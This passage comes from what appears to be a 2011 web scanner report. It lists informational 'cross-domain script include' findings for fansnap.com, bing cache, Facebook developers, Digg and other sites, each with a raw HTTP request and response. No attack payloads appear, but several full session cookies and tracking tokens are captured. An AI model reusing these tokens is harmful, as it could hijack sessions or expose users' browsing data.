Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 213
Connection: close

<html><body><div><!-- Segment Pixel - Volvo XC60 id 6225 - DO NOT MODIFY -->
<script src="http://ib.adnxs.com/seg?add=153795&t=1" type="text/javascript"></script>
<!-- End of Segment Pixel -->
</div><
...[SNIP]...

21.6. http://bing.fansnap.com/checkout/index/415814268  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 19
ETag: "912210bf9f97f8eae912bcb4828410b5"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BH%2FkqNBjoLb2Zmc2V0af6QnQ%3D%3D--976c30f9ab045a1cfd33499b88aa515a33432d71; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11824
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</script>
<script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...

21.7. http://bing.fansnap.com/checkout/index/418563179  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 22
ETag: "a77815d5d483b7d39d35206e9af3772a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CWdhqOBjoLb2Zmc2V0af6QnQ%3D%3D--8f0f6d1603aea2d08c675430159ed90f71b0f19d; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11810
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</script>
<script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...

21.8. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/events/search?q=U2+with+Interpol+(rescheduled+from+7%2f19)&p1=[Events%20source=%22vertical%22+qzeventid=%22f389669%22]&FORM=DTPEVE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420
If-None-Match: "1237402bfa716d1b23edce2a34ba2262"

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:34:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 424
ETag: "13894ec26df92ffcfe8a7d45e8580ead"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311104083; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 19:34:43 GMT
Set-Cookie: _fancat_session=BAh7EjoPc2Vzc2lvbl9pZCIlMDE4M2Q1OWNmMDhkNzQ1OTM2YmM3MzY2ZWUzMzhhYjc6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGkEIRfNFToSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NjgzMDI3NTU4NToRYmdfc3R5bGVfaWRzSSIABjsHRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAROhBzcHZfc3JjXzcwMVQ6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1z2huA5nTDigY6C29mZnNldGn%2BkJ06EXNwdl9zcmNfMTk4N1Q%3D--599dd929144daee7633c9982b135b8d1876ed56b; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 23596
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
</script>
<script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...
<![if !IE]><script src="http://ecn.dev.virtualearth.net/mapcontrol/v6.3/js/atlascompat.js"></script><![endif]>
<script src='http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3' type='text/javascript'></script>
<script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
<script src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script>
...[SNIP]...

21.9. http://cc.bingj.com/cache.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cc.bingj.com
Path:   /cache.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cache.aspx?q=xss.cx&d=4837056837976815&mkt=en-US&setlang=en-US&w=c0a8d758,848ac409 HTTP/1.1
Host: cc.bingj.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 15:15:54 GMT
Content-Length: 8574
Connection: close

<base href="http://xss.cx/"/><meta http-equiv="content-type" content="text/html; charset=utf-8"/><!-- Banner:Start --><style type="text/css">#b_cpb{color: black; font: normal normal normal small norma
...[SNIP]...
</div><script type="text/javascript" src="http://www.google.com/jsapi">
</script>
...[SNIP]...
<!-- Embedded WhosOn: Insert the script below at the point on your page where you want the Click To Chat link to appear -->
<script type='text/javascript' src='http://hostedusa3.whoson.com/include.js?domain=stalker.opticalcorp.com'></script>
...[SNIP]...

21.10. http://developers.facebook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?ref=pf HTTP/1.1
Host: developers.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.131.111
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:48 GMT
Content-Length: 13941

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_j
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.11. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:30:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=29908 10.2.128.186
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9012

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</div>

<script src="http://cdn2.diggstatic.com/js/two_column/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/two_column/lib.61fe8366.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn2.diggstatic.com/js/two_column/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

21.12. http://feeds.feedburner.com/netsparker  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.feedburner.com
Path:   /netsparker

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /netsparker HTTP/1.1
Host: feeds.feedburner.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mavitunasecurity.com/blog/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
ETag: kkpPsFNF0Wuuzu/QLigKEGMUAaI
Last-Modified: Tue, 19 Jul 2011 15:41:14 GMT
Date: Tue, 19 Jul 2011 15:41:14 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 146403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Netsparker, Web Application Security Scanner" href="http://feeds.feedburner.com/netsparker">
<script type="text/javascript" src="http://feedburner.google.com/fb/feed-styles/bf30.js"></script>
...[SNIP]...

21.13. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-0742401739139530&output=html&h=250&slotname=4384935633&w=250&lmt=1311136947&flash=10.3.181&url=http%3A%2F%2Fmajornelson.com%2F&dt=1311118945863&bpp=6&shv=r20110713&jsv=r20110627&correlator=1311118947498&frm=4&adk=2623290263&ga_vid=777545616.1311118951&ga_sid=1311118951&ga_hid=1083990928&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=6&u_nmime=40&biw=1049&bih=723&fu=0&ifi=1&dtd=M&xpc=NDGHfy2VsO&p=http%3A//majornelson.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ABL75QCUY5EGNEJJXWHGIG%3A20110620%3A1%7C36AMQQX26NAKPETSLKXA3W%3A20110620%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A3%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A3%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2; id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 19 Jul 2011 23:43:27 GMT
Server: cafe
Cache-Control: private
Content-Length: 3740
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110713/r20110719/abg.js"></script>
...[SNIP]...

21.14. http://investor.realnetworks.com/stockquote.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investor.realnetworks.com
Path:   /stockquote.cfm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /stockquote.cfm HTTP/1.1
Host: investor.realnetworks.com
Proxy-Connection: keep-alive
Referer: http://investor.realnetworks.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
